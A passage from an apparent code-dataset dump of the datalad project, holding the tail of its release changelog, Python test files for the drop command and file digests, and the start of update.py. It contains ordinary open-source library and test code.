_fixes-50:\n\nFixes\n-----\n\n- be able to\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n or\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n while providing paths while being outside of a dataset\n- remote annex datasets get properly initialized\n- robust detection of outdated\n `git-annex <http://git-annex.branchable.com/>`__\n\n.. _enhancements-and-new-features-48:\n\nEnhancements and new features\n-----------------------------\n\n- interface changes\n\n - `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n ``--recursion-limit=existing`` to not recurse into not-installed\n subdatasets\n - `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n ``-n`` to possibly install sub-datasets without getting any data\n - `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n ``--jobs|-J`` to specify number of parallel jobs for annex\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n call could use (ATM would not work when data comes from archives)\n\n- more (unit-)testing\n- documentation: see http://docs.datalad.org/en/latest/basics.html for\n basic principles and useful shortcuts in referring to datasets\n- various webface improvements: breadcrumb paths, instructions how to\n install dataset, show version from the tags, etc.\n\n0.3.1 (Oct 1, 2016) – what a wonderful week\n===========================================\n\nPrimarily bugfixes but also a number of enhancements and core\nrefactorings\n\n.. _fixes-51:\n\nFixes\n-----\n\n- do not build manpages and examples during installation to avoid\n problems with possibly previously outdated dependencies\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n can be called on already installed dataset (with ``-r`` or ``-g``)\n\n.. _enhancements-and-new-features-49:\n\nEnhancements and new features\n-----------------------------\n\n- complete overhaul of datalad configuration settings handling (see\n `Configuration\n documentation <http://docs.datalad.org/config.html>`__), so majority\n of the environment. 
Now uses git format and stores persistent\n configuration settings under ``.datalad/config`` and local within\n ``.git/config`` variables we have used were renamed to match\n configuration names\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n does not now by default upload web front-end\n- `export <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html>`__\n command with a plug-in interface and ``tarball`` plugin to export\n datasets\n- in Python, ``.api`` functions with rendering of results in command\n line got a \\_-suffixed sibling, which would render results as well in\n Python as well (e.g., using ``search_`` instead of ``search`` would\n also render results, not only output them back as Python objects)\n- `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n\n - ``--jobs`` option (passed to ``annex get``) for parallel downloads\n - total and per-download (with git-annex >= 6.20160923) progress\n bars (note that if content is to be obtained from an archive, no\n progress will be reported yet)\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n ``--reckless`` mode option\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n\n - highlights locations and fieldmaps for better readability\n - supports ``-d^`` or ``-d///`` to point to top-most or centrally\n installed meta-datasets\n - “complete” paths to the datasets are reported now\n - ``-s`` option to specify which fields (only) to search\n\n- various enhancements and small fixes to\n `meta-data <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n handling,\n `ls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html>`__,\n custom remotes, code-base formatting, downloaders, etc\n- completely switched to ``tqdm`` library (``progressbar`` is no longer\n used/supported)\n\n0.3 (Sep 23, 2016) – winter is coming\n=====================================\n\nLots of everything, including but not limited to\n\n- enhanced index viewer, as the one on http://datasets.datalad.org\n- initial new data providers support:\n `Kaggle <https://www.kaggle.com>`__,\n `BALSA <http://balsa.wustl.edu>`__,\n `NDA <http://data-archive.nimh.nih.gov>`__,\n `NITRC <https://www.nitrc.org>`__\n- initial `meta-data support and\n management <http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling>`__\n- new and/or improved crawler pipelines for\n `BALSA <http://balsa.wustl.edu>`__, `CRCNS <http://crcns.org>`__,\n `OpenfMRI <http://openfmri.org>`__\n- refactored\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n command, now with separate\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n- some other commands renaming/refactoring (e.g.,\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__)\n- datalad\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n would give you an option to install datalad’s super-dataset under\n ~/datalad if ran outside of a dataset\n\n0.2.3 (Jun 28, 2016) – busy OHBM\n--------------------------------\n\nNew features and bugfix release\n\n- support of /// urls to point to http://datasets.datalad.org\n- variety of fixes and enhancements throughout\n\n0.2.2 (Jun 20, 2016) – OHBM we are coming!\n------------------------------------------\n\nNew feature and 
bugfix release\n\n- greately improved documentation\n- publish command API RFing allows for custom options to annex, and\n uses –to REMOTE for consistent with annex invocation\n- variety of fixes and enhancements throughout\n\n0.2.1 (Jun 10, 2016)\n--------------------\n\n- variety of fixes and enhancements throughout\n\n0.2 (May 20, 2016)\n==================\n\nMajor RFing to switch from relying on rdf to git native submodules etc\n\n0.1 (Oct 14, 2015)\n==================\n\nRelease primarily focusing on interface functionality including initial\npublishing\n" }, { "alpha_fraction": 0.6377370357513428, "alphanum_fraction": 0.641990065574646, "avg_line_length": 34.60252380371094, "blob_id": "a8e7da34d8a270e83c9b88060a3438daf24c4ab9", "content_id": "8f6d0254b27d25859a109f678dd8d4e4e5f146c5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22572, "license_type": "permissive", "max_line_length": 95, "num_lines": 634, "path": "/datalad/distributed/tests/test_drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test drop command\"\"\"\n\nimport os\nimport os.path as op\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nfrom datalad.api import (\n Dataset,\n clone,\n create,\n drop,\n)\nfrom datalad.distributed.drop import (\n _detect_nondead_annex_at_remotes,\n _detect_unpushed_revs,\n)\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n assert_in,\n assert_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n known_failure_githubci_win,\n nok_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import chpwd\n\n\nckwa = dict(result_renderer='disabled')\n\n\n@with_tempfile\n@with_tempfile\ndef test_drop_file_content(path=None, outside_path=None):\n # see docstring for test data structure\n ds = get_deeply_nested_structure(path)\n axfile_rootds = op.join(\"subdir\", \"annexed_file.txt\")\n axfile_subds = op.join(\"subds_modified\", \"subdir\", \"annexed_file.txt\")\n gitfile = op.join(\"subdir\", \"git_file.txt\")\n\n # refuse to operate on non-ds paths\n assert_in_results(\n ds.drop(outside_path, on_failure='ignore'),\n status='error',\n message=('path not underneath the reference dataset %s', ds)\n )\n # we only have a single copy of annexed files right now\n # check that it is not dropped by default\n with assert_raises(IncompleteResultsError) as cme:\n ds.drop(axfile_rootds)\n # The --force suggestion from git-annex-drop is translated to --reckless.\n assert_in(\"--reckless\", str(cme.value))\n\n # error on non-existing paths\n non_existant_relpaths = ['funky', op.join('subds_modified', 'subfunky')]\n res = ds.drop(non_existant_relpaths, on_failure='ignore')\n # only two results, one per file\n assert_result_count(res, len(non_existant_relpaths))\n for rp in non_existant_relpaths:\n assert_in_results(\n res,\n type='file',\n status='error',\n action='drop',\n error_message='File unknown to git',\n path=str(ds.pathobj / rp),\n 
refds=ds.path,\n )\n\n # drop multiple files from different datasets\n ok_(ds.repo.file_has_content(axfile_rootds))\n res = ds.drop(\n [axfile_rootds, axfile_subds],\n reckless='availability',\n jobs=2,\n on_failure='ignore')\n nok_(ds.repo.file_has_content(axfile_rootds))\n assert_result_count(res, 2)\n for rp in [axfile_rootds, axfile_subds]:\n assert_in_results(\n res,\n type='file',\n status='ok',\n action='drop',\n path=str(ds.pathobj / rp),\n refds=ds.path,\n )\n\n # dropping file content for files in git\n res = ds.drop(gitfile, on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n type='file',\n # why is this 'notneeded' and not 'impossible'\n # if the latter, any operation on any dataset with a\n # single file in git would fail\n status='notneeded',\n action='drop',\n message=\"no annex'ed content\",\n path=str(ds.pathobj / gitfile),\n refds=ds.path,\n )\n\n # modified files, we cannot drop their content\n modfile = ds.pathobj / axfile_rootds\n modfile.unlink()\n modfile.write_text('new content')\n res = ds.drop(modfile, on_failure='ignore')\n assert_in_results(\n res,\n status='impossible',\n action='drop',\n message=\"cannot drop modified content, save first\",\n path=str(modfile),\n refds=ds.path,\n )\n\n # detection of untracked content\n untrackeddir = ds.pathobj / 'subds_modified' / 'subds_lvl1_modified' / \\\n f'{OBSCURE_FILENAME}_directory_untracked'\n res = ds.drop(untrackeddir, on_failure='ignore')\n assert_in_results(\n res,\n status='impossible',\n action='drop',\n message=\"cannot drop untracked content, save first\",\n path=str(untrackeddir),\n type='directory',\n refds=ds.path,\n )\n\n # and lastly, recursive drop\n res = ds.drop(recursive=True, on_failure='ignore')\n # there is not much to test here (we already dropped the only\n # annexed files above). 
however, we should see results from the top\n # ds, and the most-bottom ds\n # subdatasets\n for p in [ds.pathobj / 'subdir' / 'file_modified',\n untrackeddir]:\n assert_in_results(res, path=str(p))\n\n\n@with_tempfile\n@with_tempfile\ndef test_drop_allkeys(origpath=None, clonepath=None):\n # create a dataset with two keys, belonging to two files,\n # in two different branches\n ds = Dataset(origpath).create()\n repo = ds.repo\n repo.call_git(['checkout', '-b', 'otherbranch'])\n (ds.pathobj / 'file1').write_text('file1')\n ds.save()\n repo.call_git(['checkout', DEFAULT_BRANCH])\n (ds.pathobj / 'file2').write_text('file2')\n ds.save()\n\n # confirm we have two keys\n eq_(2, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # do it wrong first\n assert_in_results(\n ds.drop('some', what='allkeys', on_failure='ignore'),\n status='impossible',\n type='dataset',\n action='drop',\n message=(\n 'cannot drop %s, with path constraints given: %s',\n 'allkeys', [ds.pathobj / 'some']),\n )\n # confirm we still have two keys\n eq_(2, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # clone the beast and get all keys into the clone\n dsclone = clone(ds.path, clonepath)\n dsclone.repo.call_annex(['get', '--all'])\n # confirm we have two keys in the clone\n eq_(2, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # now cripple availability by dropping the \"hidden\" key at origin\n repo.call_annex(['drop', '--branch', 'otherbranch', '--force'])\n # confirm one key left\n eq_(1, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # and now drop all keys from the clone, one is redundant and can be\n # dropped, the other is not and must fail\n res = dsclone.drop(what='allkeys', jobs=2, on_failure='ignore')\n # confirm one key gone, one left\n eq_(1, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n assert_result_count(res, 1, action='drop', status='error', type='key')\n assert_result_count(res, 1, action='drop', status='ok', type='key')\n # now force it\n res = dsclone.drop(what='allkeys', reckless='availability',\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(res, 1, action='drop', status='ok', type='key')\n # all gone\n eq_(0, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_undead_annex_detection(gitpath=None, origpath=None, clonepath=None):\n gitds = Dataset(gitpath).create(annex=False)\n # a gitrepo can be inspected too, it might just not know anything\n eq_([], _detect_nondead_annex_at_remotes(gitds.repo, 'someid'))\n\n origds = Dataset(origpath).create()\n origrepo = origds.repo\n # only the local repo knows about its own annex\n eq_([None], _detect_nondead_annex_at_remotes(origrepo, origrepo.uuid))\n\n # works with clones\n cloneds = clone(origds, clonepath)\n clonerepo = cloneds.repo\n # the clone now know two locations, itself and origin\n eq_([None, DEFAULT_REMOTE],\n _detect_nondead_annex_at_remotes(clonerepo, origrepo.uuid))\n # just from cloning the original repo location does not learn\n # about the new annex in the clone\n eq_([], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # it will know after a push\n cloneds.push()\n eq_([None], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # we can declare an annex dead (here done at original location)\n origrepo.call_annex(['dead', clonerepo.uuid])\n eq_([], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # again not automatically 
communicated to clones\n eq_([None, DEFAULT_REMOTE],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n # but a fetch will make the death known\n clonerepo.call_git(['fetch'])\n eq_([None],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n # after a local git-annex branch synchronization, it is completely\n # \"gone\"\n clonerepo.localsync()\n eq_([],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n\n\n@with_tempfile\ndef test_uninstall_recursive(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.drop)\n\n ds = ds.create()\n subds = ds.create('sub')\n\n # fail to uninstall with subdatasets present\n res = ds.drop(\n what='all', reckless='availability', on_failure='ignore')\n assert_in_results(\n res,\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=('cannot drop dataset, subdataset(s) still present '\n '(forgot --recursive?): %s', [subds.path]),\n )\n res = ds.drop(\n what='all', reckless='availability', recursive=True,\n on_failure='ignore')\n # both datasets gone\n assert_result_count(res, 2)\n assert_result_count(res, 2, type='dataset', status='ok')\n # the subdataset is reported first\n eq_([subds.path, ds.path],\n [r.get('path') for r in res])\n # no dataset installed anymore\n eq_(ds.is_installed(), False)\n # not even a trace\n eq_(ds.pathobj.exists(), False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_unpushed_state_detection(origpath=None, clonepath=None):\n origds = Dataset(origpath).create()\n # always test in annex mode\n tester = lambda x: _detect_unpushed_revs(x, True)\n\n origrepo = origds.repo\n # this is still a unique repo, all payload branches are\n # unpushed\n eq_([DEFAULT_BRANCH], tester(origrepo))\n origrepo.call_git(['checkout', '-b', 'otherbranch'])\n eq_([DEFAULT_BRANCH, 'otherbranch'],\n tester(origrepo))\n # let's advance the state by one\n (origds.pathobj / 'file1').write_text('some text')\n origds.save()\n # same picture\n eq_([DEFAULT_BRANCH, 'otherbranch'],\n tester(origrepo))\n # back to original branch\n origrepo.call_git(['checkout', DEFAULT_BRANCH])\n\n # now lets clone\n cloneds = clone(origds, clonepath)\n clonerepo = cloneds.repo\n # right after the clone there will be no unpushed changes\n eq_([], tester(clonerepo))\n # even with more than one branch in the clone\n clonerepo.call_git(['checkout', '-t', f'{DEFAULT_REMOTE}/otherbranch'])\n eq_([], tester(clonerepo))\n\n # let's advance the local state now\n (cloneds.pathobj / 'file2').write_text('some other text')\n cloneds.save()\n # only the modified branch is detected\n eq_(['otherbranch'], tester(clonerepo))\n # a push will bring things into the clear\n cloneds.push(to=DEFAULT_REMOTE)\n eq_([], tester(clonerepo))\n\n # now detach HEAD, should work and not somehow require a branch\n cloneds.repo.call_git(['reset', '--hard', 'HEAD~1'])\n # we have this state\n eq_([], tester(clonerepo))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\n@with_tempfile\ndef test_safetynet(otherpath=None, origpath=None, clonepath=None):\n # we start with a dataset that is hosted somewhere\n origds = Dataset(origpath).create()\n # a clone is made to work on the dataset\n cloneds = clone(origds, clonepath)\n # checkout a different branch at origin to simplify testing below\n origds.repo.call_git(['checkout', '-b', 'otherbranch'])\n\n # an untracked file is added to simulate some work\n (cloneds.pathobj / 'file1').write_text('some text')\n # now we try to drop the entire dataset in a variety of ways\n # to check that it does not 
happen too quickly\n\n # cannot use invalid mode switch values\n assert_raises(ValueError, drop, what='bananas')\n assert_raises(ValueError, drop, reckless='rubberducky')\n\n # cannot simple run drop somewhere and give a path to a dataset\n # to drop\n with chpwd(otherpath):\n assert_raises(NoDatasetFound, drop, clonepath, what='all')\n ok_(cloneds.is_installed())\n\n # refuse to remove the CWD\n with chpwd(clonepath):\n assert_raises(RuntimeError, drop, what='all')\n ok_(cloneds.is_installed())\n\n assert_in_results(\n cloneds.drop(what='all', on_failure='ignore'),\n message='cannot drop untracked content, save first',\n status='impossible')\n ok_(cloneds.is_installed())\n\n # so let's save...\n cloneds.save()\n # - branch is progressed\n # - a new key is only available here\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"uninstall\", status=\"error\")\n ok_(res[0]['message'][0].startswith(\n \"to-be-dropped dataset has revisions \"\n \"that are not available at any known sibling\"))\n ok_(cloneds.is_installed())\n\n # so let's push -- git only\n # we cannot use git-push directly, it would not handle\n # managed branches properly\n cloneds.push(data='nothing')\n\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"uninstall\", status=\"error\")\n ok_(res[0]['message'][0].startswith(\n \"to-be-deleted local annex not declared 'dead'\"))\n # some windows test setup is not very robust, explicitly\n # include the default name \"origin\" in the test success\n # conditions to make this more robust\n eq_(res[0]['message'][1], [DEFAULT_REMOTE])\n ok_(cloneds.is_installed())\n\n # announce dead\n cloneds.repo.call_annex(['dead', 'here'])\n # but just a local declaration is not good enough\n assert_in_results(\n cloneds.drop(what='all', on_failure='ignore'),\n status='error')\n ok_(cloneds.is_installed())\n\n # so let's push that announcement also\n cloneds.push(data='nothing')\n\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"drop\", status=\"error\")\n ok_(res[0]['message'].startswith(\n \"unsafe\\nCould only verify the existence of \"\n \"0 out of 1 necessary\"),\n msg=f\"Results were {res}\")\n ok_(cloneds.is_installed())\n\n # so let's push all\n cloneds.push()\n\n # and kill the beast!\n res = cloneds.drop(what='all', on_failure='ignore')\n # only now we also drop the key!\n assert_result_count(res, 2)\n assert_in_results(\n res, action='drop', type='key', status='ok', path=cloneds.path)\n assert_in_results(\n res, action='uninstall', type='dataset', status='ok', path=cloneds.path)\n\n\n@with_tempfile\ndef test_kill(path=None):\n # create a complicated and dirty mess\n ds = get_deeply_nested_structure(path)\n # cannot use kill without recursion enabled, because there will be no\n # checks for subdatasets, hence we cannot make the impression that\n # this would be a surgical operation\n assert_raises(ValueError, ds.drop, what='all', reckless='kill')\n # wipe it out\n res = ds.drop(what='all', reckless='kill', recursive=True)\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='ok',\n path=ds.path,\n type='dataset',\n action='uninstall',\n )\n eq_(False, ds.is_installed())\n eq_(False, ds.pathobj.exists())\n\n\n@with_tempfile\ndef test_kill_7013(path=None):\n \"\"\"check that a recursive kill does not silently skip subdatasets\n contained in subdirectory: github.com/datalad/datalad/issues/7013\"\"\"\n ds = Dataset(path).create()\n (ds.pathobj / 'subdir' / 'subsubdir' 
/ 'subsubsubdir').mkdir(parents=True)\n ds.create('subdir/subdir/subds')\n ds.create('subdir/subds')\n ds.create('subds')\n res = ds.drop(path=['subds', 'subdir'], what='all',\n reckless='kill', recursive=True)\n # ensure that both subdatasets were killed\n subs = ds.subdatasets(state='present')\n assert len(subs) == 0\n\n\n@with_tempfile()\ndef test_refuse_to_drop_cwd(path=None):\n ds = Dataset(path).create()\n (ds.pathobj / 'deep' / 'down').mkdir(parents=True)\n for p in (ds.pathobj, ds.pathobj / 'deep', ds.pathobj / 'deep' / 'down'):\n with chpwd(str(p)):\n # will never remove PWD, or anything outside the dataset\n for target in (ds.pathobj, os.curdir, os.pardir, op.join(os.pardir, os.pardir)):\n assert_raises(RuntimeError, drop, path=target, what='all')\n sub = ds.create('sub')\n subsub = sub.create('subsub')\n for p in (sub.path, subsub.path):\n with chpwd(p):\n assert_raises(RuntimeError, drop, what='all')\n\n\n@with_tempfile()\ndef test_careless_subdataset_uninstall(path=None):\n # nested datasets\n ds = Dataset(path).create()\n subds1 = ds.create('deep1')\n ds.create('deep2')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1', 'deep2'])\n assert_repo_status(ds.path)\n # now we kill the sub without the parent knowing\n subds1.drop(what='all', reckless='kill', recursive=True)\n ok_(not subds1.is_installed())\n # mountpoint exists\n ok_(subds1.pathobj.exists())\n assert_repo_status(ds.path)\n # parent still knows the sub\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1', 'deep2'])\n\n\n@with_tempfile(mkdir=True)\ndef test_drop_nocrash_absent_subds(path=None):\n parent = Dataset(path).create()\n parent.create('sub')\n parent.drop('sub', reckless='availability')\n assert_repo_status(parent.path)\n with chpwd(path):\n assert_status('notneeded', drop('.', recursive=True))\n\n\n@with_tempfile(mkdir=True)\ndef test_uninstall_without_super(path=None):\n # a parent dataset with a proper subdataset, and another dataset that\n # is just placed underneath the parent, but not an actual subdataset\n parent = Dataset(path).create()\n sub = parent.create('sub')\n assert_repo_status(parent.path)\n nosub = create(op.join(parent.path, 'nosub'))\n assert_repo_status(nosub.path)\n subreport = parent.subdatasets()\n assert_result_count(subreport, 1, path=sub.path)\n assert_result_count(subreport, 0, path=nosub.path)\n # it should be possible to uninstall the proper subdataset, even without\n # explicitly calling the uninstall methods of the parent -- things should\n # be figured out by datalad\n with chpwd(parent.path):\n # check False because revisions are not pushed\n drop(sub.path, what='all', reckless='availability')\n nok_(sub.is_installed())\n # no present subdatasets anymore\n subreport = parent.subdatasets()\n assert_result_count(subreport, 1)\n assert_result_count(subreport, 1, path=sub.path, state='absent')\n assert_result_count(subreport, 0, path=nosub.path)\n # but we should fail on an attempt to uninstall the non-subdataset\n with chpwd(nosub.path):\n assert_raises(RuntimeError, drop, what='all')\n\n\n@with_tempfile\ndef test_drop_from_git(path=None):\n ds = Dataset(path).create(annex=False)\n res = ds.drop()\n assert_in_results(res, action='drop', status='notneeded')\n (ds.pathobj / 'file').write_text('some')\n ds.save()\n assert_status('notneeded', ds.drop('file'))\n assert_status('notneeded', ds.drop(what='allkeys'))\n\n\n# https://github.com/datalad/datalad/issues/6180\n@with_tempfile\n@with_tempfile\ndef test_drop_uninit_annexrepo(origpath=None, path=None):\n 
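# create a dataset at origpath, then plain git-clone it below so the clone\n    # has no initialized annex; drop(what='datasets') should still uninstall it\n    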
Dataset(origpath).create()\n # just git-clone to bypass `git annex init`\n GitRepo.clone(origpath, path)\n ds = Dataset(path)\n assert_status('ok', ds.drop(what='datasets'))\n nok_(ds.is_installed())\n\n\n# https://github.com/datalad/datalad/issues/6577\n@with_tempfile\ndef test_drop_allkeys_result_contains_annex_error_messages(path=None):\n # when calling drop with allkeys, expect git-annex error\n # message(s) to be present in the result record error_message\n ds = Dataset(path).create()\n # mock annex call always yielding error-messages in this dataset\n with patch.object(ds.repo, '_call_annex_records_items_') as mock_call:\n mock_call.return_value = iter([{\n 'command': 'drop',\n 'success': False,\n 'error-messages': ['git-annex error message here']}])\n assert_in_results(\n ds.drop(what='allkeys', on_failure='ignore'),\n error_message='git-annex error message here',\n )\n\n\n# https://github.com/datalad/datalad/issues/6948\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7197\n@with_tempfile\n@with_tempfile\ndef test_nodrop_symlinked_annex(origpath=None, clonepath=None):\n # create a dataset with a key\n ds = Dataset(origpath).create(**ckwa)\n testfile = ds.pathobj / 'file1'\n testcontent = 'precious'\n testfile.write_text(testcontent)\n ds.save(**ckwa)\n rec = ds.status(testfile, annex='availability',\n return_type='item-or-list', **ckwa)\n eq_(testcontent, Path(rec['objloc']).read_text())\n\n def _droptest(_ds):\n # drop refuses to drop from a symlinked annex\n if (_ds.repo.dot_git / 'annex').is_symlink():\n assert_raises(AssertionError, _ds.drop, **ckwa)\n for what in ('all', 'allkeys', 'filecontent', 'datasets'):\n assert_raises(AssertionError, _ds.drop, what=what, **ckwa)\n # but a reckless kill works without crashing\n _ds.drop(what='all', recursive=True, reckless='kill', **ckwa)\n nok_(_ds.is_installed())\n # nothing has made the original file content vanish\n _rec = ds.status(\n testfile, annex='availability',\n return_type='item-or-list', **ckwa)\n eq_(testcontent, Path(_rec['objloc']).read_text())\n\n # test on a clone that does not know it has key access\n dsclone1 = clone(ds.path, clonepath, reckless='ephemeral', **ckwa)\n _droptest(dsclone1)\n\n # test again on a clone that does think it has a key copy\n dsclone2 = clone(ds.path, clonepath, reckless='ephemeral', **ckwa)\n if not dsclone2.repo.is_managed_branch():\n # it really should not matter, but 'origin' is set to annex.ignore=true\n # on crippledFS\n # https://github.com/datalad/datalad/issues/6960\n dsclone2.get('.')\n _droptest(dsclone2)\n" }, { "alpha_fraction": 0.3653061091899872, "alphanum_fraction": 0.6214285492897034, "avg_line_length": 38.20000076293945, "blob_id": "0beaa636267346d47799d0e3c29c9baa773b3433", "content_id": "76c4558f5795c61f3100eb8da9bb6e9d0a025871", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1960, "license_type": "permissive", "max_line_length": 153, "num_lines": 50, "path": "/datalad/support/tests/test_digests.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### 
##\n\nfrom os.path import join as opj\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n with_tree,\n)\n\nfrom ..digests import Digester\n\n\n@with_tree(tree={'sample.txt': '123',\n '0': chr(0),\n 'long.txt': '123abz\\n'*1000000})\ndef test_digester(path=None):\n digester = Digester()\n assert_equal(\n digester(opj(path, 'sample.txt')),\n {\n 'md5': '202cb962ac59075b964b07152d234b70',\n 'sha1': '40bd001563085fc35165329ea1ff5c5ecbdbbeef',\n 'sha256': 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3',\n 'sha512': '3c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2'\n })\n\n assert_equal(\n digester(opj(path, '0')),\n {\n 'md5': '93b885adfe0da089cdf634904fd59f71',\n 'sha1': '5ba93c9db0cff93f52b521d7420e43f6eda2784f',\n 'sha256': '6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d',\n 'sha512': 'b8244d028981d693af7b456af8efa4cad63d282e19ff14942c246e50d9351d22704a802a71c3580b6370de4ceb293c324a8423342557d4e5c38438f0e36910ee',\n })\n\n assert_equal(\n digester(opj(path, 'long.txt')),\n {\n 'md5': '81b196e3d8a1db4dd2e89faa39614396',\n 'sha1': '5273ac6247322c3c7b4735a6d19fd4a5366e812f',\n 'sha256': '80028815b3557e30d7cbef1d8dbc30af0ec0858eff34b960d2839fd88ad08871',\n 'sha512': '684d23393eee455f44c13ab00d062980937a5d040259d69c6b291c983bf635e1d405ff1dc2763e433d69b8f299b3f4da500663b813ce176a43e29ffcc31b0159'\n })\n" }, { "alpha_fraction": 0.5333905220031738, "alphanum_fraction": 0.5337584018707275, "avg_line_length": 38.98039245605469, "blob_id": "63e36be693d9e10620a0686610154a3b2bed087f", "content_id": "4dde06d526fec5bf67fa27ca2aa693906a2197c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24468, "license_type": "permissive", "max_line_length": 98, "num_lines": 612, "path": "/datalad/distribution/update.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for updating a dataset\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom os.path import lexists\nimport itertools\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n YieldDatasets\n)\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError\n)\nfrom datalad.support.param import Parameter\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.distribution.dataset import require_dataset\n\nfrom .dataset import (\n EnsureDataset,\n datasetmethod,\n)\n\nlgr = logging.getLogger('datalad.distribution.update')\n\n\nclass YieldDatasetAndRevision(YieldDatasets):\n \"\"\"Like YieldDatasets, but also provide \"gitshasum\" value, if any.\n \"\"\"\n def __call__(self, res):\n ds = super(YieldDatasetAndRevision, self).__call__(res)\n return ds, 
